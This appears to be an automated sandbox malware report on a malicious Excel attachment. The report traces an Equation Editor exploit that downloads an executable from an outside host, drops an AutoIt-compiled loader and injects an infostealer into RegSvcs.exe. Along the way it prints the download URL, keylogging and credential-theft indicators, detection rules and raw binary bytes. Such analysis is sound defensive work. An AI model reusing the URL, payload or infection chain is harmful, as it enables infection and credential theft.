                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bd 94 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 28 07 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 10 00 00 04 00 00 ed 89 10 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 10 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 1c 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 dc 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 
72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 80 03 00 00 70 0c 00 00 82 03 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 71 00 00 00 00 10 00 00 72 00 00 00 98 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: Joe Sandbox View | ASN Name: GTDCOLOMBIASASCO GTDCOLOMBIASASCO
                  Source: global traffic | HTTP traffic detected: GET /ngbx/ngown.exe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: aquafusion.com.co
                      Connection: Keep-Alive
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035604F5 URLDownloadToFileW
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe
                  Source: global traffic | HTTP traffic detected: GET /ngbx/ngown.exe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: aquafusion.com.co
                      Connection: Keep-Alive
                  Source: global traffic | DNS traffic detected: DNS query: aquafusion.com.co
                  Source: EQNEDT32.EXE, 00000002.00000002.486608016.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.482907203.000000000092E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exe
                  Source: EQNEDT32.EXE, 00000002.00000003.482907203.000000000091F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exeG
                  Source: EQNEDT32.EXE, 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.486608016.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exejjC:
                  Source: EQNEDT32.EXE, 00000002.00000003.482907203.000000000092E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://aquafusion.com.co/ngbx/ngown.exeroC:
                  Source: ghxtg8op.exe, 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, POq2Ux.cs | .Net Code: _6JpPt
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DB4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DB4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DB3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DA001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DCCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                  System Summary

                  Source: sheet1.xml, type: SAMPLE | Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D43B3A This is a third-party compiled AutoIt script.
                  Source: ghxtg8op.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ghxtg8op.exe, 00000005.00000000.482962513.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ghxtg8op.exe, 00000005.00000000.482962513.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                  Source: ghxtg8op.exe.2.dr | String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ghxtg8op.exe.2.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                  Source: ngown[1].exe.2.dr | String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: ngown[1].exe.2.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created (dropped file): C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created (dropped file): C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: 770B0000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DAA1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D98310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DA51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D4E6A0
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D63187
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D6D975
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D621C5
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D762D2
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DC03DA
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D7242E
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D625FA
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D566E1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D9E616
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D7878F
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DA8889
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DC0857
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D76844
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D58808
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D6CB21
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D76DB6
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D56F9E
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D53030
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D6F1D9
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D41287
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D61484
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D55520
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D67696
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D55760
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D61978
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D79AB5
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D4FCE0
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DC7DDB
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D61D90
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D6BDA6
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D53FE0
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D4DF00
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00995108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_002D3908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_002DB158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_002D4520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_002DE608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_002D3C50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_003E58E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_003E09D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_002DB51A
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: String function: 00D60AE3 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: String function: 00D68900 appears 42 times
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: String function: 00D47DE1 appears 35 times
                  Source: sheet1.xml, type: SAMPLE | Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.ghxtg8op.exe.d00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, ZTFEpdjP8zw.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, WnRNxU.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 2njIk.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, I5ElxL.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, QQSiOsa4hPS.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, FdHU4eb83Z7.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 5.2.ghxtg8op.exe.d00000.0.raw.unpack, 3VzYbXLJt4.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@1/1
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DAA06A GetLastError,FormatMessageW
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D981CB AdjustTokenPrivileges,CloseHandle
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DAB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DBEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00DAC397 CoInitialize,CoCreateInstance,CoUninitialize
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Code function: 5_2_00D44E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Nova naredba_HR-WJO-12-10-2024.xlam.xlsx
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR9AB8.tmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | ReversingLabs: Detection: 65%
                  Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: wow64win.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: wow64cpu.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | Initial sample: OLE zip file path = xl/media/image1.png
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: wntdll.pdb source: ghxtg8op.exe, 00000005.00000003.485569970.0000000002980000.00000004.00001000.00020000.00000000.sdmp, ghxtg8op.exe, 00000005.00000003.485229228.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx Initial sample: OLE indicators vbamacros = False
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D44B37 LoadLibraryA,GetProcAddress,5_2_00D44B37
                  Source: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe Code function: 5_2_00D68945 push ecx; ret 5_2_00D68958
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
